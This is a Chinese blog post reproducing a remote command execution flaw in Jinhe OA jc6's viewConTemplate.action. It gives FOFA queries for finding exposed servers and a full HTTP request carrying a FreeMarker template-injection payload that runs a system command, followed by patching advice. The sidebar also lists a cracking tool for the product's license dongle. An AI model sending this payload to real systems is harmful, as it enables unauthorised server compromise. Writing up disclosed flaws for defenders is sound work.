【漏洞复现】​金和OA-viewConTemplate.action-远程命令执行漏洞

最新推荐文章于 2024-05-30 21:37:26 发布
最新推荐文章于 2024-05-30 21:37:26 发布
阅读量392 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80733390/article/details/136901291
版权
本文报道了金和OAviewConTemplate.action存在的远程命令执行漏洞,攻击者可通过恶意输入执行任意代码。建议加强输入验证和过滤,及时应用官方安全补丁以防止风险。
摘要由CSDN通过智能技术生成

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

金和OA viewConTemplate.action存在远程命令执行漏洞。攻击者可能通过精心构造的输入数据,在未经适当授权的情况下执行任意恶意代码指令。

影响范围

金和OA jc6

资产测绘

FOFA:

app="金和网络-金和OA"
body="JHSoft.Web.AddMenu"
body="/jc6/platform/"
body="/jc6/platform/sys/login"

image

漏洞复现

漏洞数据包:

POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 152
Content-Type: application/x-www-form-urlencoded

moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522whoami%2522%29%257D%253C%252Fclob%253E&uuid=1

moduId=1&code=<clob>${"freemarker.template.utility.Execute"?new()("whoami")}</clob>&uuid=1

image

修复建议

1、加强输入安全控制:
对viewConTemplate.action处理的所有用户可操控参数执行严格的验证与过滤措施,确保任何可能含有恶意系统命令或特殊字符的数据均被有效拦截和净化,从而消除远程命令执行的风险。
2、及时应用安全更新:
确认并获取金和OA官方发布的针对viewConTemplate.action漏洞的安全补丁或版本升级,立即执行升级操作以提升系统的安全性,修复已知的远程命令执行漏洞。

Nday_Seeker
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
金和OA任意文件读取漏洞
xiaokp7的博客
09-13 471
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用金和OA系统存在任意文件读取漏洞,攻击者通过恶意构造的请求下载服务器上的任意文件,包括敏感文件、配置文件、数据库文件等。
OA系统漏洞记录
Aquarius_ego的博客
05-14 4805
OA系统介绍及相关漏洞(不断更新哦~)
漏洞复现--金和OASQL注入
qq_53003652的博客
10-23 511
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品GetTreeDate.aspx存在SQL注入漏洞。sqlmap直接梭哈。
漏洞复现金和OA C6 FileDownLoad.aspx 任意文件读取漏洞
最新发布
siu~
05-30 340
金和OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件。系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
金和OA jc6 viewConTemplate.action RCE漏洞复现
Keepb1ue的博客
03-14 708
金和OA协同办公管理系统j6软件是一种综合性的协同办公解决方案,旨在提高企业内部的协作效率和工作效率。它提供了一系列功能和工具,帮助组织进行任务管理、日程安排、文件共享、团队协作和沟通等方面的工作。
记一次项目上的漏洞挖掘
Workers77的博客
02-14 3857
接到领导通知,要对某个客户的资产做一次渗透,客户只给了一个C段IP,具体的资产需要自己去收集 通过fofa搜索后,拿到一堆的资产。看了一遍发现客户有个金和OA系统,于是就有了下面的故事 打开后就是个登录界面,因为在前期信息收集的时候也看到这个OA存在一个用户名的注入漏洞(历史漏洞 金和协同管理平台SQL注入漏洞(无需登录demo站成功复现) | wooyun-2015-0141624| WooYun.org),这个洞虽然比较老了,但也可以试一下。按照这个保姆级教程抓包测试 结果可想而知 ..
金和软件OA浏览器设置.doc
11-17
金和软件OA浏览器设置 金和软件OA浏览器设置是指在IE浏览器中对OA系统的浏览器设置,以确保OA系统的正常运行。下面是金和软件OA浏览器设置的详细步骤和相关知识点: 设置IE浏览器属性 金和软件OA浏览器设置的第一...
OA可行性报告书-分享.doc
09-09
本报告书探讨的是XX公司引入金和协同办公平台的可行性,旨在解决企业在信息管理和业务执行上的挑战,进一步推动企业战略目标的落地。 1. 工程背景 随着XX公司的发展,已经部署了ERP、预算管理系统等多个信息系统,...
AMZScout免費提供的Amazon FBA計算器-4.3.1.zip
12-26
使用者友好的One-clickFBA計算器能為您計算Amazon傭金和總利潤。無需輸入ASIN,只需在Amazon網站的產品頁面上啟動外掛程式即可。 該擴充功能在哪些國家可以使用? -美國(Amazon.com) -日本(Amazon.co.jp) -英國...
金和OA加密狗破解组件
07-13
通过调整程序类库破解金和OA加密狗通过调整程序类库破解金和OA加密狗
漏洞复现金和OA任意文件读取漏洞
晚风不及你
12-18 606
金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
漏洞复现金和OA C6任意文件读取漏洞
失心少年
09-08 1030
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理协同管理平台,并不断地更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。该OA C6系统的download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
金和OA GetSqlData.aspx 远程命令执行漏洞
xiaokp7的博客
09-13 765
金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。金和OA GetTreeDate存在SQL注入漏洞
漏洞复现--金和OA clobfield SQL注入
qq_53003652的博客
12-19 734
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞
任意文件读取与下载漏洞
qq_42307546的博客
01-27 683
任意文件读取与下载,一些网站
复现金和OA协同管理平台 任意文件上传漏洞_20
fushuang333的博客
01-16 706
复现金和OA协同管理平台 任意文件上传漏洞金和C6协同管理平台包括协同办公管理,人力资源管理,项目管理,客户关系管理,企业目标管理,费用管理,移动办公,微信办公等多个业务范围
金和oa jc6 ntko-upload 任意文件上传漏洞
01-16
金和OA JC6是一套企业办公协同软件,用于企业内部的办公流程管理协同办公。而NTKO-Upload是金和OA JC6中的一个模块,用于用户在办公过程中上传文件进行共享和交流。 然而,金和OA JC6和NTKO-Upload存在一个任意文件上传漏洞。该漏洞可能会被恶意攻击者利用,上传恶意文件,从而对系统造成潜在的安全风险。 恶意上传的文件可能包含恶意代码、病毒或其他有害的文件,攻击者可通过这些文件获取系统权限、窃取敏感信息、篡改数据等。由于金和OA JC6广泛应用于企业内部,一旦该漏洞被利用,可能会对企业的信息安全带来严重威胁。 为了防止利用这个漏洞进行任意文件上传的攻击,建议用户采取以下措施: 1. 及时升级金和OA JC6和NTKO-Upload软件,确保软件的最新版本中修复了该漏洞。 2. 对金和OA JC6和NTKO-Upload进行适当的安全配置,禁用或限制用户上传的文件类型和大小,只允许上传安全可信的文件。 3. 定期进行系统漏洞扫描和安全评估,及时发现并修复可能存在漏洞。 4. 配置防火墙和入侵检测系统,及时发现和阻止恶意上传行为。 5. 培训企业员工,提高其安全意识,警惕不明文件的上传和下载。 总之,任意文件上传漏洞金和OA JC6和NTKO-Upload的安全构成潜在威胁,为保护企业信息安全,必须采取相应的安全防护措施,并保持软件的更新和维护。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值